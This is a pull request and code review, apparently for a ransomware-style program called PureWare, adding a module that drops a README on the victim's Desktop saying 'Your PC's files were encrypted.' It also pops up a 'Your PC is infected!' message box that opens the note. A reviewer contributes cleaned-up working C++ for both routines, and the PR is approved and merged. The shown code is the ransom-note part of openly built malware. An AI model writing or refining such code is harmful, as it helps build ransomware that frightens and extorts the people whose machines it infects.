### PR TITLE
develop NoteModule: done

### PR DESCRIPTION
**Pull request by DeathLore**
NoteModule done. It creates README file, that contains something; by default: "Your PC's files were encrypted.", but you can change contained by specifying wstring with appropriate content. Also, this class notifies user that program worked and says that user can read README file at Desktop.

### CODE REVIEW

File: PureWare.cpp [hunk 1]
```diff
@@ -198,4 +201,57 @@ void FileModule::FindDirectory() {
...
+        wcscat(string_to_open_README, README_file_path.c_str());
+
+        SetConsoleOutputCP(1251);
+        SetConsoleCP(1251);
+        _wsystem(string_to_open_README);
+    }
+}
+
+// Method that creates README file at Desktop
+void NoteModule::Create_README_file(std::filesystem::path README_path) {
```
Comment (npushkarev) [inline PureWare.cpp]:
```
void NoteModule::Create_README_file(const std::filesystem::path& README_path) {
    // Проверка и создание директории, если нужно
    std::filesystem::create_directories(README_path.parent_path());

    // Открытие файла для записи
    std::wofstream out(README_path);
    if (!out) {
        std::cerr << "Не удалось открыть файл для записи." << std::endl;
        return;
    }

    // Запись в файл
    out << Note_that_would_be_set_in_file << std::endl;

    // Файл закроется автоматически при выходе из области видимости
}
```

File: PureWare.cpp [hunk 2]
```diff
@@ -198,4 +201,57 @@ void FileModule::FindDirectory() {
...
+
+// NoteModule implementation starts here
+
+NoteModule::NoteModule() : Note_that_would_be_set_in_file(L"Your PC's files were encrypted.\n") {
+}
+
+NoteModule::NoteModule(std::wstring Note_that_would_be_set_in_file) : Note_that_would_be_set_in_file(Note_that_would_be_set_in_file) {
+}
+
+void NoteModule::MakeSomeShit() {
```
Comment (npushkarev) [inline PureWare.cpp]:
```
#include <shlwapi.h> // Для PathCombineW и т.д.

void NoteModule::MakeSomeShit() {
    // Получение пути к рабочему столу пользователя
    wchar_t desktopPath[MAX_PATH];
    SHGetFolderPathW(NULL, CSIDL_DESKTOP, NULL, 0, desktopPath);

    // Создание полного пути файла README.txt
    std::filesystem::path README_file_path = std::filesystem::path(desktopPath) / L"README.txt";
    Create_README_file(README_file_path);

    // Вывод MessageBox
    int msgboxID = MessageBox(NULL, L"Your PC is infected!\nCheck README.txt file on your desktop.\nPush \"Yes\" button to open file right now.", L"CHECK README!", MB_ICONEXCLAMATION | MB_YESNO);

    // Если нажата кнопка "Yes" - открыть README.
    if (msgboxID == IDYES) {
        ShellExecute(NULL, L"open", README_file_path.c_str(), NULL, NULL, SW_SHOWNORMAL);
    }
}
```

**Comment by HYUEHFJKhfjklkej** [comment]
глянь коменты

File: PureWare.cpp (hunk 2 above)
Comment (DeathLore) [reply PureWare.cpp]: Changes added due to code review.

Добавил изменения исходя из code review.

**Review by HYUEHFJKhfjklkej — APPROVED** [review]

**Pull request merged**